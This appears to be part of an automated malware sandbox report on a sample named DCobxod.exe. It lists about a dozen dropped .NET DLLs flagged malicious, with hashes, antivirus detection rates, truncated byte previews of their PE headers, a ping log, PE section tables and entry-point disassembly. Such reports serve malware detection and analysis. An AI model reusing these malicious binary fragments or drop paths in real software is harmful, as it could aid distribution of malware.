                                                            Entropy (8bit):5.679286635687991
                                                            Encrypted:false
                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):46592
                                                            Entropy (8bit):5.870612048031897
                                                            Encrypted:false
                                                            SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                            MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                            SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                            SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                            SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):5.541771649974822
                                                            Encrypted:false
                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34304
                                                            Entropy (8bit):5.618776214605176
                                                            Encrypted:false
                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.629584586954759
                                                            Encrypted:false
                                                            SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                            MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                            SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                            SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                            SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.660491370279985
                                                            Encrypted:false
                                                            SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                            MD5:240E98D38E0B679F055470167D247022
                                                            SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                            SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                            SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):40448
                                                            Entropy (8bit):5.7028690200758465
                                                            Encrypted:false
                                                            SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                            MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                            SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                            SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                            SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):64000
                                                            Entropy (8bit):5.857602289000348
                                                            Encrypted:false
                                                            SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                            MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                            SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                            SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                            SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):41472
                                                            Entropy (8bit):5.6808219961645605
                                                            Encrypted:false
                                                            SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                            MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                            SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                            SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                            SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):294912
                                                            Entropy (8bit):6.010605469502259
                                                            Encrypted:false
                                                            SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                            MD5:00574FB20124EAFD40DC945EC86CA59C
                                                            SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                            SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                            SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 11%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):85504
                                                            Entropy (8bit):5.8769270258874755
                                                            Encrypted:false
                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36352
                                                            Entropy (8bit):5.668291349855899
                                                            Encrypted:false
                                                            SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                            MD5:94DA5073CCC14DCF4766DF6781485937
                                                            SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                            SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                            SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):1224
                                                            Entropy (8bit):4.435108676655666
                                                            Encrypted:false
                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                            Malicious:false
                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4608
                                                            Entropy (8bit):3.9136468723342275
                                                            Encrypted:false
                                                            SSDEEP:48:6WJJGPtqM7Jt8Bs3FJsdcV4MKe27/+vqBHKOulajfqXSfbNtm:2PxPc+Vx9Mmvk0cjRzNt
                                                            MD5:35DCD480CE17A6CA1277441D78F9E65B
                                                            SHA1:E7122A3D57C44C0D67862A48077360A8E25B438A
                                                            SHA-256:28A6EC5C587AE0C7A8F72ABA61AB19BC8599E6D13B227D41BDCF27F0DFA9ADAC
                                                            SHA-512:DC9E0C28FFC4F5A00FF87AC99761D04EF61539B265607EBC85110AA4916F1A5CE9FC3A71E8D3653D14FD8923F16651F3395D9CF0E4AF5D464DE73A7F42772E68
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................n'... ...@....@.. ....................................@................................. '..K....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                            Process:C:\Windows\System32\PING.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):502
                                                            Entropy (8bit):4.6103462178019665
                                                            Encrypted:false
                                                            SSDEEP:12:PR45pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:JKdUOAokItULVDv
                                                            MD5:7F48CA448373AA5F29388ECD8774273A
                                                            SHA1:752382BEB77E9571198056440BC31E38794E742B
                                                            SHA-256:45C2AAF408A9D5F26552732E3B911AB00D2D579736FA6F18E6B3DA7563F722A7
                                                            SHA-512:4A18F00254BA4958EC3D4ED81B4E8CA87DE73F84FAF70EBFA639D051AD79C7C48AD4A12C702A18047D3DC2D9105BAAC562E5B9857CA5CFED32E335CF061533A7
                                                            Malicious:false
                                                            Preview:..Pinging 878411 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):1.2817708917906911
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:DCobxod.exe
                                                            File size:36'950'717 bytes
                                                            MD5:bc4a8996f18f14f3c77fff13fd23b00d
                                                            SHA1:431779aa67e97a32824956d9f3c9122a8340486b
                                                            SHA256:58040788269169456e7831099188a99796227cac63cc28771496d9f97204b895
                                                            SHA512:1e7e873f4af45963ffd59973bd1d76fbe5bf3841414788ade05aab69f11aae66c5fa3da082a43183a094fb12f5f94e35190e01c9ac224888f557f659a453471c
                                                            SSDEEP:98304:yrdqTz4+mudOlbI9tp2159NiHZOGDjuXnU:0dqvYwO23mwY8
                                                            TLSH:F987F10A75E25F32C2615A304663163D52A0E7323A12FF0F3A4F2096B9577F59E762B3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                            Icon Hash:1515d4d4442f2d2d
                                                            Entrypoint:0x41f530
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                            Instruction
                                                            call 00007FF474C8ABCBh
                                                            jmp 00007FF474C8A4DDh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            push dword ptr [ebp+08h]
                                                            mov esi, ecx
                                                            call 00007FF474C7D327h
                                                            mov dword ptr [esi], 004356D0h
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            and dword ptr [ecx+04h], 00000000h
                                                            mov eax, ecx
                                                            and dword ptr [ecx+08h], 00000000h
                                                            mov dword ptr [ecx+04h], 004356D8h
                                                            mov dword ptr [ecx], 004356D0h
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            mov esi, ecx
                                                            lea eax, dword ptr [esi+04h]
                                                            mov dword ptr [esi], 004356B8h
                                                            push eax
                                                            call 00007FF474C8D96Fh
                                                            test byte ptr [ebp+08h], 00000001h
                                                            pop ecx
                                                            je 00007FF474C8A66Ch
                                                            push 0000000Ch
                                                            push esi
                                                            call 00007FF474C89C29h
                                                            pop ecx
                                                            pop ecx
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FF474C7D2A2h
                                                            push 0043BEF0h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FF474C8D429h
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FF474C8A5E8h
                                                            push 0043C0F4h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FF474C8D40Ch
                                                            int3
                                                            jmp 00007FF474C8EEA7h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push 00422900h
                                                            push dword ptr fs:[00000000h]
                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
